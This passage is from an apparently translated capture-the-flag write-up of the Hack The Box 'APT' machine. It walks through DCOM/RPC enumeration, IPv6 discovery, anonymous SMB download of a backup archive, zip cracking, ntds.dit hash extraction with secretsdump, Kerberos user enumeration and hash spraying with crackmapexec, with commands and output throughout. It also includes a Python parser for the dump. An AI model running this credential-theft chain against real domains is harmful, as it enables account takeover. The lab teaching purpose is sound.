└─# exiftool p2.jpg        
ExifTool Version Number         : 12.76
File Name                       : p2.jpg
Directory                       : .
File Size                       : 28 kB
File Modification Date/Time     : 2019:09:06 01:58:48+08:00
File Access Date/Time           : 2024:03:02 16:31:45+08:00
File Inode Change Date/Time     : 2024:03:02 16:31:45+08:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.02
Resolution Unit                 : None
X Resolution                    : 100
Y Resolution                    : 100
Quality                         : 60%
DCT Encode Version              : 100
APP14 Flags 0                   : [14], Encoded with Blend=1 downsampling
APP14 Flags 1                   : (none)
Color Transform                 : YCbCr
Image Width                     : 370
Image Height                    : 247
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 370x247
Megapixels                      : 0.091
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# strings p2.jpg
。。。

Still nothing valuable, but while looking through the images one stands out as odd:
(screenshot 2024-03-02-16-37-17)
The text on it looks out of place, like some kind of hint, and the filename also seems to carry a meaning.

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# wget http://10.129.96.60/images/outsource.jpg
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# exiftool outsource.jpg 
ExifTool Version Number         : 12.76
File Name                       : outsource.jpg
Directory                       : .
File Size                       : 1779 kB
File Modification Date/Time     : 2019:12:23 19:36:32+08:00
File Access Date/Time           : 2024:03:02 16:35:26+08:00
File Inode Change Date/Time     : 2024:03:02 16:35:26+08:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 300
Y Resolution                    : 300
Image Width                     : 1920
Image Height                    : 1152
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1920x1152
Megapixels                      : 2.2
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# strings outsource.jpg 
。。。

Still nothing special. Nothing has come of this port for now, so we set it aside, but we may need to come back to it once we have gathered more information.

Trying to connect to MSRPC

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcclient -U '' -N 10.129.96.60
Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT
                                      
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcclient -U '' -N -p 135 10.129.96.60
Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT

rpcclient connects to port 139 by default; we tried both ports and neither could be connected to.

Trying to use MSRPC

For this service we can use the important tools from the Python 3 impacket library.

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# export PATH=/usr/share/doc/python3-impacket/examples:$PATH
                                   
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# echo $PATH                                                
/usr/share/doc/python3-impacket/examples:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin:/root/.local/bin:/root/.local/bin

This library is very important during a penetration test for in-depth scanning and exploitation of the basic protocols; many of its tools come up again and again. The official description is at https://www.coresecurity.com/core-labs/open-source-tools/impacket
Note that "low-level" there means the bottom layer of the protocol stack, i.e. fundamental, not low quality: it gives access to the packets of these protocols at the lowest level. Let's start using it:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcdump.py 10.129.96.60
。。。

rpcdump.py: This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well known endpoints.

This tool only lists the DCOM components, methods and so on running over RPC on port 135, but it does not tell us what they actually do. This is where rpcmap comes in: it is finer-grained than rpcdump, maps out the specifics of DCOM and enumerates it in depth.

rpcmap.py: Scan for listening DCE/RPC interfaces. This binds to the MGMT interface and gets a list of interface UUIDs. If the MGMT interface is not available, it takes a list of interface UUIDs seen in the wild and tries to bind to each interface.

DCOM (Distributed Component Object Model) is a set of Microsoft concepts and program interfaces in which client program objects can request services from server program objects on other computers in a network.

Brute-forcing interface UUIDs and opnums

This is unfamiliar to us, but that is normal: unfamiliar technology shows up all the time during a penetration test. For now we only want to know what the UUIDs in these results are and which service or interface is running behind them. rpcmap can brute-force this:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcmap.py ncacn_ip_tcp:10.129.96.60[135] -brute-uuids -brute-opnums
。。。
Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0
Opnum 0: rpc_x_bad_stub_data               
Opnum 1: rpc_x_bad_stub_data               
Opnum 2: rpc_x_bad_stub_data               
Opnum 3: success                           
Opnum 4: rpc_x_bad_stub_data               
Opnum 5: success                           
Opnums 6-64: nca_s_op_rng_error (opnum not found)

Protocol: [MS-RPCE]: Remote Management Interface
Provider: rpcrt4.dll                       
UUID: AFA8BD80-7D8A-11C9-BEF4-08002B102989 v1.0
Opnum 0: success
Opnum 1: rpc_x_bad_stub_data
Opnum 2: success
Opnum 3: success
Opnum 4: rpc_x_bad_stub_data
Opnums 5-64: nca_s_op_rng_error (opnum not found)
。。。

Apart from the ones listed above, everything else returned rpc_s_access_denied or could not be brute-forced, so it is not meaningful.
Searching for these two UUIDs already shows the corresponding interface names; the interface details also list the corresponding methods that can be called.

Looking for a way to exploit it

Look closely: each of these methods has its own opnum, which matches our brute-force results above, so we should focus on the third and fifth methods, the fifth being an extension of the other. But this information comes from official Microsoft documentation, which will not provide exploitation details, so we search further.
Indeed, someone else wanted to call this method just as we do, and provided a tool for it. Searching further still, we find the details of using this resolver in the article below:

The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication


https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/

This article series will be composed of two parts:
The first part will explain how to to achieve a remote enumeration of network interfaces on a Windows OS machine without any authentication. We will show that this is done from a RPC method which is held by the IOXIDResolver interface. This interface is part of the DCOM remote object activation. A python script and the methodology to implement such a tool in native code will be delivered.
The second part will explain why such RPC is used inside a DCOM environment. This involves diving into the OXID Resolver component. The latter requires to understand some DCOM concepts such as transparency, marshalling and object reference. This part will be described in the next blog post.

Resolving the hidden IPv6 addresses

Skimming the article, the situation is very similar to ours. The tool it uses comes from https://github.com/mubix/IOXIDResolver ; let's try it:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# python3 IOXIDResolver.py -h
IOXIDResolver.py -t <target>
                         
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# python3 IOXIDResolver.py -t 10.129.96.60
[*] Retrieving network interface of 10.129.96.60
Address: apt
Address: 10.129.96.60
Address: dead:beef::10b
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::f9e3:e61a:564f:3e8a

Information gathering

Looking at the result, the resolver has revealed the target's IPv6 addresses! This is important information. The next step is to verify that these addresses are valid, so we save them first. We can scan the new addresses with nmap, following the same port-scanning approach as usual:

IPv6 full TCP port scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f -oA nmapscan/6tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:17 CST
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.38s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49675/tcp open  unknown
49698/tcp open  unknown
54047/tcp open  unknown

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# tcports6=$(grep open nmapscan/6tcports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
echo $tcports6
53,80,88,135,389,445,464,593,636,3268,5985,9389,47001,49665,49666,49667,49669,49670,49698,54047
IPv6 detailed TCP scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]                                                                                                                          
└─# nmap -6 -sT -sC -sV -O -p53,80,88,135,389,445,464,593,636,3268,5985,9389,47001,49665,49666,49667,49669,49670,49698,54047 dead:beef::b885:d62a:d679:573f -oA nmapscan/6tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:27 CST                                                                                                          
sendto in send_ipv6_ipproto_raw: sendto(10, packet, 80, 0, dead:beef::b885:d62a:d679:573f, 28) => Operation not permitted                                                   
Offending packet: ICMPv6 (58) dead:beef:2::100d > dead:beef::b885:d62a:d679:573f (type=128/code=0) hopl=55 flow=12345 payloadlen=40                                         
Unable to send packet in probe_transmission_handler: Operation not permitted (1)                                                                                            
Nmap scan report for dead:beef::b885:d62a:d679:573f                                                                                                                         
Host is up (0.20s latency).                                                                                
PORT      STATE SERVICE      VERSION                                                                                                                                        
53/tcp    open  domain       Simple DNS Plus                                                                                                                                
80/tcp    open  http         Microsoft IIS httpd 10.0                                                                                                                       
|_http-title: Bad Request                                                                                                                                                   
| http-server-header:                                                                                                                                                       
|   Microsoft-HTTPAPI/2.0                                                                                                                                                   
|_  Microsoft-IIS/10.0                                                                                                                                                      
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-07 08:27:29Z)                                                                                 
135/tcp   open  msrpc        Microsoft Windows RPC                                                                                                                          
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)                                                     
| ssl-cert: Subject: commonName=apt.htb.local                                                                                                                               
| Subject Alternative Name: DNS:apt.htb.local                                                                                                                               
| Not valid before: 2020-09-24T07:07:18                                                                                                                                     
|_Not valid after:  2050-09-24T07:17:18                                                                                                                                     
|_ssl-date: 2024-03-07T08:28:41+00:00; -27s from scanner time.                                                                                                              
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)                                                                               
464/tcp   open  kpasswd5?                                                                                                                                                   
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0                                                                                                            
636/tcp   open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)                                                     
| ssl-cert: Subject: commonName=apt.htb.local                                                                                                                               
| Subject Alternative Name: DNS:apt.htb.local                                                                                                                               
| Not valid before: 2020-09-24T07:07:18                                                                                                                                     
|_Not valid after:  2050-09-24T07:17:18                                                                                                                                     
|_ssl-date: 2024-03-07T08:28:40+00:00; -28s from scanner time.                                 
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2024-03-07T08:28:41+00:00; -27s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0 
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0 
|_http-title: Bad Request
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        Microsoft Windows RPC
49698/tcp open  msrpc        Microsoft Windows RPC
54047/tcp open  msrpc        Microsoft Windows RPC
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows Vista|7|2008 R2|2012 R2 (96%)
OS CPE: cpe:/o:microsoft:windows_vista::sp2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_server_2012:r2
OS fingerprint not ideal because: Some probes failed to send so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -27s, deviation: 1s, median: -27s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2024-03-07T08:28:26
|_  start_date: 2024-03-07T05:58:50
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: apt
|   NetBIOS computer name: APT\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: apt.htb.local
|_  System time: 2024-03-07T08:28:27+00:00
IPv6 UDP port scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 -sU --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f -oA nmapscan/6udports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:23 CST
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.18s latency).
All 65535 scanned ports on dead:beef::b885:d62a:d679:573f are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
IPv6 vulnerability script scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 --script=vuln -p53,80,88,135,389,445,464,593,636,3268,5985,9389,47001,49665,49666,49667,49669,49670,49698,54047 dead:beef::b885:d62a:d679:573f -oA nmapscan/6vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:35 CST
Stats: 0:03:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 16:38 (0:00:00 remaining)
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.24s latency).

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49698/tcp open  unknown
54047/tcp open  unknown

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
Analysis of the scan results

Looking at the results, these are clearly the typical ports of a domain controller. We add the discovered domain name to the hosts file; ports 80, 135, 445 and 593 get priority. The web service on the IPv6 address turns out to be the same as on IPv4, so it is not considered further.

Trying the SMB shares over IPv6

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# smbclient -L //htb.local
Password for [WORKGROUP\root]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        backup          Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
htb.local is an IPv6 address -- no workgroup available
# Obviously, the share we are most interested in is backup
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# smbclient  //htb.local/backup
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Sep 24 15:30:52 2020
  ..                                  D        0  Thu Sep 24 15:30:52 2020
  backup.zip                          A 10650961  Thu Sep 24 15:30:32 2020

                5114623 blocks of size 4096. 2634678 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (577.5 KiloBytes/sec) (average 577.5 KiloBytes/sec)
# try the other shares:
┌──(root㉿hunter)-[/home/…/htb/APT/backup/registry]
└─# smbclient  //htb.local/IPC$
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
                                      
┌──(root㉿hunter)-[/home/…/htb/APT/backup/registry]
└─# smbclient  //htb.local/NETLOGON
Password for [WORKGROUP\root]:
Anonymous login successful
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED

smb: \> exit
┌──(root㉿hunter)-[/home/…/htb/APT/backup/registry]
└─# smbclient  //htb.local/SYSVOL                                                                            
Password for [WORKGROUP\root]:
Anonymous login successful

tree connect failed: NT_STATUS_CONNECTION_RESET
# Obviously these are very valuable files, but unfortunately they are encrypted, and since they come from a backup they may not be the latest.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# unzip -l backup.zip                   
Archive:  backup.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2020-09-23 19:40   Active Directory/
 50331648  2020-09-23 19:38   Active Directory/ntds.dit
    16384  2020-09-23 19:38   Active Directory/ntds.jfm
        0  2020-09-23 19:40   registry/
   262144  2020-09-23 19:22   registry/SECURITY
 12582912  2020-09-23 19:22   registry/SYSTEM
---------                     -------
 63193088                     6 files
# Obviously they are safe; we don't need to analyze them more deeply.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# unzip -d backup backup.zip
Archive:  backup.zip
   creating: backup/Active Directory/
[backup.zip] Active Directory/ntds.dit password: 
   skipping: Active Directory/ntds.dit  incorrect password
   skipping: Active Directory/ntds.jfm  incorrect password
   creating: backup/registry/
   skipping: registry/SECURITY       incorrect password
   skipping: registry/SYSTEM         incorrect password

Trying to crack the zip

John the Ripper requires password hashes in a specific format. First convert the ZIP file's password hash into that format with the zip2john utility that ships with John the Ripper:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# zip2john backup.zip > zip.hash
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB ts=9CCA cs=acd0 type=8
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785 ts=9CCA cs=2a39 type=8
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3 ts=9AC6 cs=9beb type=8
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD ts=9AC6 cs=65d9 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash  
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch   (backup.zip)     
1g 0:00:00:00 DONE (2024-03-09 10:30) 20.00g/s 819200p/s 819200c/s 819200C/s 123456..loserface1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# unzip -d backup backup.zip
Archive:  backup.zip
   creating: backup/Active Directory/
[backup.zip] Active Directory/ntds.dit password: 
  inflating: backup/Active Directory/ntds.dit  
  inflating: backup/Active Directory/ntds.jfm  
   creating: backup/registry/
  inflating: backup/registry/SECURITY  
  inflating: backup/registry/SYSTEM  

We cracked it quickly.

About ntds.dit:
NTDS.DIT is critical in Active Directory. It serves as the central repository for all domain objects and their related information. Any change made to the domain, such as creating a new user account, modifying group membership or updating user attributes, is reflected in the NTDS.DIT file. The file is the single source of truth for the whole domain, enabling efficient administration and authentication. Put simply, once we can read and parse this file we obtain the hashes of the domain; cracking those hashes is equivalent to taking control of the entire domain. Importantly, extraction and cracking of these passwords can be performed offline, so the cracking itself will not be detected; once an attacker has extracted these hashes, they can act as any user in the domain.

Reading ntds.dit with secretsdump

secretsdump also comes from the excellent impacket library and is well suited to reading ntds.dit:

┌──(root㉿hunter)-[/home/…/htb/APT/backup/Active Directory]
└─# export PATH=/usr/share/doc/python3-impacket/examples:$PATH
                
┌──(root㉿hunter)-[/home/…/htb/APT/backup/Active Directory]
└─# secretsdump.py -ntds ./ntds.dit -system ../registry/SYSTEM LOCAL > ../../user_hash_raw
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# cat user_hash_raw| wc -l
8005
# So much data! We need to extract the lines that carry an account's password hash, i.e. the ones ending in ":::", and then try to collide them.
# At this point, in a real engagement we could first try the Administrator hash directly against WinRM; there is some chance of success, but this is a lab target, so it will not be that easy.

Start processing the data:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# cat user_hash_raw| grep ':::' | awk -F':' '{print $1}' | sort -u > user_list
                                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# cat user_hash_raw| grep ':::' | awk -F':' '{print $3,$4}' | sed 's/ /:/g' > hash_list 
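As an added example (not part of the original write-up), the same extraction in Python: it parses the `:::` lines of secretsdump output into the user list and the LM:NT hash list, and, as the defender's reading of the same data, flags accounts with a blank password and accounts that share one NT hash. The dump text, RIDs and NT hashes below are constructed; only the two well-known empty-LM and empty-NT values are real.

```python
import re
from collections import defaultdict

# Well-known fixed values; both also appear in the tool output of this write-up.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" : LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" : blank password

# One NTDS credential line as secretsdump prints it: [DOMAIN\]user:rid:lmhash:nthash:::
NTDS_LINE = re.compile(
    r"^(?P<principal>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Constructed sample of "secretsdump.py -ntds ./ntds.dit -system SYSTEM LOCAL" output
# (not the real dump; every NT hash and the bootKey below is made up).
SAMPLE_DUMP = """\
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x0000000000000000000000000000dead
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] Reading and decrypting hashes from ./ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
htb.local\\alice.example:1105:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
htb.local\\bob.example:1106:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
[*] Kerberos keys from ./ntds.dit
Administrator:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
[*] Cleaning up...
"""


def parse_secretsdump(text):
    """Return one dict per ':::' credential line; banner, [*] status and
    Kerberos-key lines do not match the pattern and are skipped."""
    records = []
    for raw in text.splitlines():
        m = NTDS_LINE.match(raw.strip())
        if not m:
            continue
        user = m["principal"].split("\\")[-1]  # drop the DOMAIN\ prefix if present
        records.append({"user": user, "rid": int(m["rid"]),
                        "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return records


def split_users_and_hashes(records):
    """The two files the grep/awk pipeline builds: unique users, unique LM:NT pairs.
    De-duplicating the hashes already removes pointless repeated attempts."""
    users = sorted({r["user"] for r in records})
    hashes = sorted({f"{r['lm']}:{r['nt']}" for r in records})
    return users, hashes


def audit_hashes(records):
    """Defender view of the same dump: blank passwords, one NT hash shared by
    several accounts (password reuse) and accounts that still store an LM hash."""
    blank = [r["user"] for r in records if r["nt"] == EMPTY_NT]
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    shared = {nt: users for nt, users in by_nt.items()
              if len(users) > 1 and nt != EMPTY_NT}
    lm_stored = [r["user"] for r in records if r["lm"] != EMPTY_LM]
    return {"blank_password": blank, "shared_nt_hash": shared, "lm_hash_stored": lm_stored}


def write_lists(records, user_path="user_list", hash_path="hash_list"):
    """Write the same two files the shell pipeline produces."""
    users, hashes = split_users_and_hashes(records)
    with open(user_path, "w") as fh:
        fh.write("\n".join(users) + "\n")
    with open(hash_path, "w") as fh:
        fh.write("\n".join(hashes) + "\n")
    return len(users), len(hashes)


if __name__ == "__main__":
    recs = parse_secretsdump(SAMPLE_DUMP)
    print(split_users_and_hashes(recs))
    print(audit_hashes(recs))
```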

Using the pre-authentication mechanism to validate users and hashes

From the above we know the hash list and the user list are about 2000 lines each. Colliding them directly would mean a huge number of combinations and would be very slow, so before that we must filter out the valid users to cut the unnecessary work. We can use the DC's pre-authentication mechanism: the response differs depending on whether the user exists, which tells us which users are valid. The tool kerbrute does this for us:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# kerbrute userenum -d htb.local --dc htb.local ./user_list        

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 03/09/24 - Ronnie Flathers @ropnop

2024/03/09 11:49:52 >  Using KDC(s):
2024/03/09 11:49:52 >   htb.local:88

2024/03/09 11:50:03 >  [+] VALID USERNAME:       Administrator@htb.local
2024/03/09 11:51:09 >  [+] VALID USERNAME:       APT$@htb.local
2024/03/09 11:57:38 >  [+] VALID USERNAME:       henry.vinson@htb.local
2024/03/09 12:08:08 >  Done! Tested 2000 usernames (3 valid) in 1096.093 seconds

In fact this is not the only way; we can also use an nmap script:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='htb.local',userdb=user_list htb.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-09 11:53 CST
Stats: 0:01:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 43.78% done; ETC: 11:56 (0:01:40 remaining)
Nmap scan report for htb.local (dead:beef::b885:d62a:d679:573f)
Host is up (0.21s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users: 
| Discovered Kerberos principals
|     Administrator@htb.local
|     henry.vinson@htb.local
|_    APT$@htb.local

Nmap done: 1 IP address (1 host up) scanned in 173.48 seconds

Among these, APT$ has an unusual naming structure and is clearly a hidden account; hidden accounts are generally used for system-level functions, so it may also be worth exploiting. Now that the valid users are filtered out, the next step is obviously hash collision: try the 2000 hashes against these three valid users, and if one pair succeeds we have a foothold.

Trying the hash collision

crackmapexec can also be used for hash collision; we have to specify the protocol to use, and from the information gathering we are limited to three protocols. SMB is the first choice:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# crackmapexec smb htb.local -u usr_effective -H hash_list 
SMB         htb.local       445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:9ea25adafeec63e38cef4259d3b15c30 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:3ae49ec5e6fed82ceea0dc2be77750ab STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:531c98e26cfa3caee2174af495031187 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:fde29e6cb61b4f7fda1ad5cd2759329d STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:51d368765462e9c5aebc456946d8dc86 STATUS_LOGON_FAILURE 
